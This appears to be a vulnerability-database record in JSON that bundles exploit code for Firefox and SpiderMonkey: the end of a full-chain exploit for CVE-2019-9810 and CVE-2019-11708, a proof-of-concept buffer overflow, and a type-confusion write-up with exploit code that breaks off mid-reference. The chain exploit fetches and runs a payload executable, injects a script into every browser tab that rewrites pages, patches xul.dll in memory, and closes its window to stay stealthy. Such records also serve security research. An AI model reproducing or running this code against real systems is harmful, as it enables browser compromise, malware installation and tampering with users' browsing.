0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)\r\n // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)\r\n //\r\n\r\n const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;\r\n Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));\r\n\r\n //\r\n // From there, we're kinda done - let's get god mode and fuck off.\r\n //\r\n\r\n GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);\r\n return true;\r\n}\r\n\r\n//\r\n// This function uses a `Sandbox` with a `System Principal` to be able to grab the\r\n// `docShell` object off the `window` object. Once it has it, it can grab the frame\r\n// `messageManager` that we need to trigger the sandbox escape.\r\n//\r\n\r\nfunction GetContentFrameMessageManager(Win) {\r\n function _GetDocShellFromWindow(Win) {\r\n return Win.docShell;\r\n }\r\n\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n const Cu = Components.utils;\r\n const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());\r\n const Code = _GetDocShellFromWindow.toSource();\r\n Cu.evalInSandbox(Code, Sbx);\r\n const DocShell = Sbx._GetDocShellFromWindow(Win);\r\n Cu.nukeSandbox(Sbx);\r\n return DocShell.messageManager;\r\n}\r\n\r\n//\r\n// This function sends a 'Prompt:Open' message over the frame message manager IPC,\r\n// with an URI.\r\n//\r\n\r\nfunction PromptOpen(Uri) {\r\n const FrameMM = GetContentFrameMessageManager(window);\r\n const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });\r\n return Result;\r\n}\r\n\r\n//\r\n// This is the function that abuses the `Prompt:Open` message to re-exploit the parent\r\n// process and escape the sandbox.\r\n//\r\n\r\nfunction TriggerCVE_2019_11708() {\r\n PromptOpen(`${location.origin}?stage3`);\r\n}\r\n\r\n//\r\n// This is the function that gets written into the frame script the exploit drops\r\n// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a\r\n// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:\r\n// Services.mm.loadFrameScript('file://frame-script.js', true)\r\n// This should break in the `Browser Content Toolbox` debugger window.\r\n//\r\n\r\nfunction FrameScriptPayload() {\r\n function PimpMyDocument() {\r\n\r\n //\r\n // Don't infect doar-e and leave Cthulhu alone...\r\n //\r\n\r\n if(content.document.location.origin == 'https://doar-e.github.io' ||\r\n content.document.location.origin == 'http://localhost:8000') {\r\n return;\r\n }\r\n\r\n //\r\n // .. as well as don't play with non http origins (I've seen empty/null origins).\r\n //\r\n\r\n if(!content.document.location.origin.startsWith('http')) {\r\n return;\r\n }\r\n\r\n //\r\n // Time to party! Let's find every `A` tag and make them point to doar-e.\r\n // We also use this opportunity to make every `backgroundImage` / `backgroundColor`\r\n // style attributes to `none` / `transparent` to not hide the doar-e background.\r\n //\r\n\r\n for(const Node of content.document.getElementsByTagName('*')) {\r\n if(Node.tagName == 'A') {\r\n Node.href = 'https://doar-e.github.io/';\r\n continue;\r\n }\r\n\r\n Node.style.backgroundImage = 'none';\r\n Node.style.backgroundColor = 'transparent';\r\n }\r\n\r\n //\r\n // Change the background.\r\n //\r\n\r\n content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';\r\n }\r\n\r\n //\r\n // First we set an event handler to make sure to be invoked when a new `content`\r\n // is created. Keep in mind that we basically have ~three cases to handle:\r\n // 1/ We are getting injected in an already existing tab,\r\n // 2/ We are getting injected in a new tab,\r\n // 3/ A user clicks on a link and a new `content` gets created.\r\n // We basically want to have control over those three events. The below ensures\r\n // we get a chance to execute code for 2/.\r\n //\r\n\r\n addEventListener('DOMWindowCreated', FrameScriptPayload);\r\n dump(`Hello from: ${content.location.origin}\\n`);\r\n\r\n if(content.document != null && content.document.body != null) {\r\n\r\n //\r\n // Either the tab already existed in which case we already have a document which we\r\n // can play with...\r\n //\r\n\r\n PimpMyDocument();\r\n return;\r\n }\r\n\r\n //\r\n // ..Or it doesn't exist quite yet and we want to get a callback when it does.\r\n //\r\n\r\n content.addEventListener('load', PimpMyDocument);\r\n}\r\n\r\n//\r\n// This function drops a file (open + write + close) using the OSFile JS module.\r\n//\r\n\r\nfunction DropFile(Path, Content) {\r\n\r\n //\r\n // We expect either a string or a TypedArray.\r\n //\r\n\r\n const Encoder = new TextEncoder();\r\n const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;\r\n return OS.File.open(Path, {write: true, truncate: true})\r\n .then(File => {\r\n return Promise.all([\r\n // We return the File object in order to be able to use it in the\r\n // next `.then`. This allows us to chain the `write` and the `close`\r\n // without another level of deepness.\r\n File,\r\n File.write(ContentBuffer),\r\n ]);\r\n })\r\n .then((Results) => {\r\n const [File, _WrittenBytes] = Results;\r\n return File.close();\r\n });\r\n}\r\n\r\n//\r\n// This function drops / executes a payload binary, as well as inject a frame script\r\n// into every tabs.\r\n//\r\n\r\nfunction Payload() {\r\n\r\n //\r\n // Import a bunch of JS modules we will be using later.\r\n //\r\n\r\n const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n\r\n //\r\n // First order of business, we create a first promise that downloads the payload\r\n // (aka Slime Shady), drops it in the profile directory and finally executes it.\r\n //\r\n\r\n const Dir = OS.Constants.Path.localProfileDir;\r\n const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');\r\n const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)\r\n .then((Response) => {\r\n\r\n //\r\n // We return the result as a TypedArray as this is what `DropFile`\r\n // expects for binary content.\r\n //\r\n\r\n return Response.arrayBuffer();\r\n })\r\n .then((Content) => {\r\n\r\n //\r\n // Time to drop the file now. Note that we return the promise so\r\n // the next `then` executes when the file has been successfully dropped.\r\n //\r\n\r\n dbg(`Payload downloaded.`);\r\n return DropFile(PayloadPath, new Uint8Array(Content));\r\n })\r\n .then(() => {\r\n\r\n //\r\n // At this point, we are ready to spawn the payload, let's do it!\r\n //\r\n\r\n dbg(`Creating the process.. ${PayloadPath}`);\r\n CreateProcessA(PayloadPath);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in payload promise: ${Ex}`);\r\n });\r\n\r\n //\r\n // Second order of business is to backdoor the tabs. To do so, we drop a frame\r\n // script that we inject into every tabs.\r\n //\r\n\r\n const FramePayloadContent = `${FrameScriptPayload.toSource()}\r\n\r\nFrameScriptPayload();`;\r\n const ScriptPath = OS.Path.join(Dir, 'frame-script.js');\r\n const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)\r\n .then(() => {\r\n\r\n //\r\n // At this time we are ready to inject the frame script into the tabs.\r\n // Note that we need to drop the file locally / use the file:// scheme\r\n // so that the tabs accept to interpret the file (unfortunately,\r\n // remote ones are ignored).\r\n //\r\n\r\n dbg(`About to loadFrameScript: ${ScriptPath}`);\r\n Services.mm.loadFrameScript(`file://${ScriptPath}`, true);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in frame payload promise: ${Ex}`);\r\n });\r\n\r\n\r\n //\r\n // Last but not least, we set up code to execute on completion of both the above\r\n // promises. You have to remember that at this point the modal window is still open\r\n // and blocks navigation / UI interaction, so we need to close it as soon as we can\r\n // to be as stealth as possible.\r\n // Just for kicks, we spawn a calculator when we're done because why not.\r\n //\r\n\r\n Promise.all([PayloadPromise, FramePayloadPromise])\r\n .then(() => {\r\n\r\n //\r\n // .. just for kicks.\r\n //\r\n\r\n CreateProcessA('c:\\\\windows\\\\system32\\\\calc.exe');\r\n\r\n //\r\n // Phew, we made it here let's close the window :).\r\n //\r\n\r\n window.close();\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in clean up promise: ${Ex}`);\r\n window.close();\r\n });\r\n}\r\n\r\n//\r\n// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()\r\n// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have\r\n// god mode. It's far from being the cleanest way, but this is the easiest way I found.\r\n//\r\n// nsresult nsSocketTransport::InitiateSocket() {\r\n// SOCKET_LOG((\"nsSocketTransport::InitiateSocket [this=%p]\\n\", this));\r\n// nsresult rv;\r\n// bool isLocal;\r\n// IsLocal(&isLocal);\r\n// if (gIOService->IsNetTearingDown()) {\r\n// return NS_ERROR_ABORT;\r\n// }\r\n// if (gIOService->IsOffline()) {\r\n// if (!isLocal) return NS_ERROR_OFFLINE;\r\n// } else if (!isLocal) {\r\n// if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&\r\n// !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {\r\n// nsAutoCString ipaddr;\r\n// RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);\r\n// netaddr->GetAddress(ipaddr);\r\n// fprintf_stderr(\r\n// stderr,\r\n// \"FATAL ERROR: Non-local network connections are disabled and a \"\r\n// \"connection \"\r\n// \"attempt to %s (%s) was made.\\nYou should only access hostnames \"\r\n// \"available via the test networking proxy (if running mochitests) \"\r\n// \"or from a test-specific httpd.js server (if running xpcshell \"\r\n// \"tests). \"\r\n// \"Browser services should be disabled or redirected to a local \"\r\n// \"server.\\n\",\r\n// mHost.get(), ipaddr.get());\r\n// MOZ_CRASH(\"Attempting to connect to non-local address!\");\r\n// }\r\n// }\r\n//\r\n\r\nfunction PatchInitiateSocket() {\r\n\r\n //\r\n // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // so that it doesn't assert on us because we turned on testing features.\r\n // This is the assert we hit without the patch:\r\n //\r\n // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.\r\n // You should only access hostnames available via the test networking proxy\r\n // (if running mochitests) or from a test-specific httpd.js server (if running\r\n // xpcshell tests). Browser services should be disabled or redirected to a local\r\n // server.\r\n // (4014.82c): Break instruction exception - code 80000003 (first chance)\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:\r\n // 00007ff9`69a66372 cc int 3\r\n //\r\n // Here is the disasembly before:\r\n //\r\n // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)]\r\n //\r\n // And after:\r\n //\r\n // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 90 nop\r\n // 00007ff9`3f9c55c7 90 nop\r\n // 00007ff9`3f9c55c8 90 nop\r\n // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n //\r\n // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul\r\n // Evaluate expression: 1529286 = 00000000`001755c6\r\n //\r\n\r\n const PatchOffset = 0x001755c6n;\r\n const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());\r\n const PatchAddress = XulBase + PatchOffset;\r\n const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];\r\n PatchCode(PatchAddress, PatchContent);\r\n}\r\n\r\nfunction Main(Route) {\r\n\r\n //\r\n // One way to tell if we were successful with our data corruption is by checking\r\n // if we have access to the PrivilegeManager. If we do, it means we are running\r\n // with a privileged context, if not we don't.\r\n //\r\n\r\n const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;\r\n if(Route == '?stage1') {\r\n\r\n //\r\n // If we are asked to run stage1 with access to a privileged context, we skip\r\n // it and move on to stage2.\r\n //\r\n\r\n if(RunningFromPrivilegedJS) {\r\n return Main('?stage2');\r\n }\r\n\r\n //\r\n // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access\r\n // a privileged JS context.\r\n //\r\n\r\n if(!ExploitCVE_2019_9810()) {\r\n console.log('Failed :(');\r\n return;\r\n }\r\n\r\n //\r\n // Once we are done with the data corruption, we refresh the page to get access\r\n // to the privileged JS context. Moving on to stage2 \\o/.\r\n //\r\n\r\n location.replace(`${location.origin}/?stage2`);\r\n }\r\n\r\n if(Route == '?stage2') {\r\n\r\n //\r\n // At this point we expect to have access to a privileged JS context.\r\n // If we don't it's probably bad news, so we'll just bail.\r\n //\r\n\r\n if(!RunningFromPrivilegedJS) {\r\n alert('problem');\r\n return;\r\n }\r\n\r\n //\r\n // Turn on privileges so that we can access the `Components` object.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // Now that we have access to the privileged context, we are also able to talk\r\n // over the frame message manager IPC and trigger CVE-2019-11708 to escape the\r\n // exploit the parent process.\r\n //\r\n\r\n TriggerCVE_2019_11708();\r\n }\r\n\r\n if(Route == '?stage3') {\r\n\r\n //\r\n // We should now be running in the broker which means we can exploit CVE-2019-9810\r\n // to perform the same attack than in stage1 but this time in the parent process.\r\n //\r\n\r\n if(!ExploitCVE_2019_9810()) {\r\n console.log('Elevation failed, closing the window.');\r\n window.close();\r\n }\r\n\r\n //\r\n // If we are successful it means that by refreshing the page, we should have\r\n // access to the privileged JS context from the parent process.\r\n // This basically means full compromise and we move on to backdooring the tabs,\r\n // as well as dropping the payload.\r\n //\r\n\r\n location.replace(`${location.origin}/?final`);\r\n }\r\n\r\n if(Route == '?final') {\r\n\r\n //\r\n // All right, we start of by turning on privileges so that we can access `Components`\r\n // & cie.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // We've worked hard to get here and it's time to drop the goodies :).\r\n //\r\n\r\n Payload();\r\n }\r\n}\r\n\r\nfunction Onload() {\r\n if(location.search != '') {\r\n Main(location.search);\r\n }\r\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47752"}], "zdt": [{"lastseen": "2019-03-29T01:23:29", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2019-03-27T00:00:00", "title": "Firefox 66.0.1 - Array.prototype.slice Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32423", "href": "https://0day.today/exploit/description/32423", "sourceData": "Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow \r\n\r\n<script>\r\n\r\nlet size = 64;\r\n\r\ngarr = [];\r\nj = 0;\r\nfunction gc(){\r\n\tvar tmp = [];\r\n\tfor(let i = 0;i < 0x20000;i++){\r\n\t\ttmp[i] = new Uint32Array(size * 2);\r\n\t\tfor(let j = 0;j < (size*2);j+=2){\r\n\t\t\ttmp[i][j] = 0x12345678;\r\n\t\t\ttmp[i][j+1] = 0xfffe0123;\r\n\t\t}\r\n\t}\r\n\tgarr[j++] = tmp;\r\n}\r\n\r\nlet arr = [{},2.2];\r\n\r\nlet obj = {};\r\n\r\nobj[Symbol.species] = function(){\r\n\tvictim.length = 0x0;\r\n\tfor(let i = 0;i < 0x2000;i++){\r\n\t\tgvictim[i].length = 0x0;\r\n\t\tgvictim[i] = null;\r\n\t}\r\n\tgc();\r\n\t//Array.isArray(garr[0][0x10000]);\r\n\treturn [1.1];\r\n}\r\n\r\nlet gvictim = [];\r\n\r\nfor(let i = 0;i < 0x1000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nlet victim = [1.1,2.2];\r\nvictim.length = size;\r\nvictim.fill(3.3);\r\n\r\nfor(let i = 0x1000;i < 0x2000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nfunction fake(arg){\r\n}\r\nfor(let i = 0;i < size;i++){\r\n\tfake[\"x\"+i.toString()] = 2.2;\r\n}\r\n\r\nfunction jit(){\r\n\tvictim[1] = 1.1;\r\n\tarr.slice();\r\n\t//fake.x2 = 6.17651672645e-312;\r\n\treturn victim[2];\r\n}\r\n\r\nflag = 0;\r\n\r\n\r\nfor(let i = 0;i < 0x10000;i++){\r\n\txx = jit();\r\n}\r\n\r\narr.constructor = obj;\r\n\r\nArray.isArray(victim);\r\nalert(333);\r\nalert(jit());\r\n</script>\n\n# 0day.today [2019-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32423"}, {"lastseen": "2019-04-04T23:40:13", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2019-04-03T00:00:00", "title": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-04-03T00:00:00", "id": "1337DAY-ID-32482", "href": "https://0day.today/exploit/description/32482", "sourceData": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)\r\n\r\nA bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects.\r\n\r\n# Prerequisites\r\n\r\nIn Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:\r\n\r\n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)\r\n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot\r\n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array\r\n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored\r\n\r\nSpidermonky makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\"widens\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through \"type barriers\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.\r\n\r\n# Crashing Testcase\r\n\r\nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:\r\n\r\n function hax(o, changeProto) {\r\n if (changeProto) {\r\n o.p = 42;\r\n o.__proto__ = {};\r\n }\r\n o.p = 13.37;\r\n return o;\r\n }\r\n\r\n for (let i = 0; i < 1000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n for (let i = 0; i < 10000; i++) {\r\n let o = hax({}, true);\r\n eval('o.p'); \t\t\t// Crash here\r\n }\r\n\r\n\r\nCrashes in debug builds of Spidermonkey with:\r\n\r\n Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265\r\n Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266\r\n\r\nThis assertion expresses that type inference data is inconsistent for the property .p as the type \"float\" is not in the list of possible types but the property currently holds a float value.\r\n\r\n# Bug Analysis\r\n\r\nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.\r\n\r\nIn detail, the following appears to be happening:\r\n\r\nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.\r\n\r\nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will\r\n\r\n1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and\r\n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].\r\n\r\nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode):\r\n\r\n // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually\r\n // this check is performed before entering the JITed code)\r\n VerifyInputTypes\r\n\r\n if (changeProto) {\r\n // A SetProperty [12] inline cache [13] which will perform the actual\r\n // property store and speed up subsequent property stores on objects of\r\n // the same Shape and Group. Since a type barrier is required, the Group\r\n // is used as an additional index into the cache so that both Shape and\r\n // Group must match, in which case no inferred types could be\r\n // accidentially invalidated.\r\n SetPropertyICWithTypeBarrier o.p 42\r\n\r\n Call ChangePrototype(o, {})\r\n }\r\n\r\n // Another inline cache to store property .p again, but this time without a\r\n // type barrier. As such, only the Shape will be checked and not the Group.\r\n SetPropertyIC o.p 13.37\r\n\r\n Return o\r\n\r\nAfter compilation finishes, the following happens in the first invocation of the JITed code:\r\n\r\n* The function is called with an object of ObjectGroup OG2 and Shape S1\r\n* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types\r\n* The prototype of o is changed\r\n * This again causes a new ObjectGroup, OG3, to be allocated\r\n * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]\r\n * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}\r\n* The second propertystore cache runs into a cache miss (because it is empty at this point)\r\n * Execution transfers to the slow path (a runtime property store)\r\n * This will store the property and update the inferred types of OG3 to {.p: [int, float]}\r\n * It will then update the inline cache to now directly handle property stores to objects with shape S1\r\n * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]\r\n\r\nThen, in the second invocation of the JITed code:\r\n\r\n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype\r\n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)\r\n* It then directly writes the property value into the property slot without updating inferred types\r\n\r\nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().\r\n\r\nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:\r\n\r\n1. Iterate over the set of possible object types, in this case that is OG1 and OG2\r\n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types\r\n\t- In this case, OG1 already has the correct type for property .p, so no violation there\r\n\t- And OG2 does not even track property types, so again no violation [17]\r\n3. If no violations were found, no type barrier is needed\r\n\r\nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determine that a type barrier is not needed, leading to the scenario described above.\r\n\r\n# Exploitation\r\n\r\nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.\r\n\r\nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:\r\n\r\n let ab = new ArrayBuffer(1024);\r\n\r\n function hax(o, changeProto) {\r\n // The argument type for |o| will be object of group OG1 or OG2. OG1 will\r\n // have the inferred types {.p: [Y]}. OG2 on the other hand will be an\r\n // ObjectGroup with unknown property types due to the prototype change. As\r\n // such, OG2 will never have any inferred property types.\r\n\r\n // Ultimately, this code will confuse types X and Y with each other.\r\n // Type X: a Uint8Array\r\n let x = new Uint8Array(1024);\r\n // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)\r\n let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};\r\n\r\n if (changeProto) {\r\n o.p = x;\r\n\r\n // This prototype change will cause a new ObjectGroup, OG_N, to be\r\n // allocated for o every time it is executed (because the prototype is\r\n // stored in the ObjectGroup). During creation of the new ObjectGroup,\r\n // the current property values will be used to infer property types. As\r\n // such, OG_N will have the inferred types {.p: [X]}.\r\n o.__proto__ = {};\r\n }\r\n\r\n // This property write was not marked as requiring type barriers to\r\n // validate the consistency of inferred property types. The reason is that\r\n // for OG1, the property type is already correct and OG2 does not track\r\n // property types at all. However, IonMonkey failed to realize that the\r\n // ObjectGroup of o could have changed in between to a new ObjectGroup that\r\n // has different inferred property types. As such, the type barrier\r\n // omission here is unsafe.\r\n //\r\n // In the second invocation, the inline cache for this property store will\r\n // then be a hit (because the IC only uses the Shape to index the cache,\r\n // not the Group). As such, the inferred types associated with the\r\n // ObjectGroup for o will not be updated and will be left inconsistent.\r\n o.p = y;\r\n\r\n return o;\r\n }\r\n\r\n function pwn(o, trigger) {\r\n if (trigger) {\r\n // Is on a code path that wasn't executed in the interpreter so that\r\n // IonMonkey solely relies on type inference instead of type profiles\r\n // from the interpreter (which would show the real type).\r\n return o.p[0];\r\n } else {\r\n return 42;\r\n }\r\n }\r\n\r\n // \"Teach\" the function hax that it should accept objects with ObjectGroup OG1.\r\n // This is required as IonMonkey needs to have at least one \"known\" type when\r\n // determining whether it can omit type barriers for property writes:\r\n // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282\r\n for (let i = 0; i < 10000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n // Compile hax to trigger the bug in such a way that an object will be created\r\n // whose ObjectGroup indicates type X for property .p but whose real type will\r\n // be Y, where both X and Y can be arbitrarily chosen.\r\n let evilObj;\r\n for (let i = 0; i < 10000; i++) {\r\n evilObj = hax({}, true);\r\n\r\n // Not sure why this is required here, it maybe prevents JITing of the main\r\n // script or similar...\r\n eval('evilObj.p');\r\n }\r\n\r\n // JIT compile the second function and make it rely on the (incorrect) type\r\n // inference data to omit runtime type checks.\r\n for (let i = 0; i < 100000; i++) {\r\n pwn(evilObj, false);\r\n }\r\n\r\n // Finally trigger a type confusion.\r\n pwn(evilObj, true);\r\n\r\nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way.\r\n\r\n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54\r\n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463\r\n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87\r\n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37\r\n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466\r\n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469\r\n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448\r\n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254\r\n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/\r\n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219\r\n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946\r\n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280\r\n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache\r\n[14] 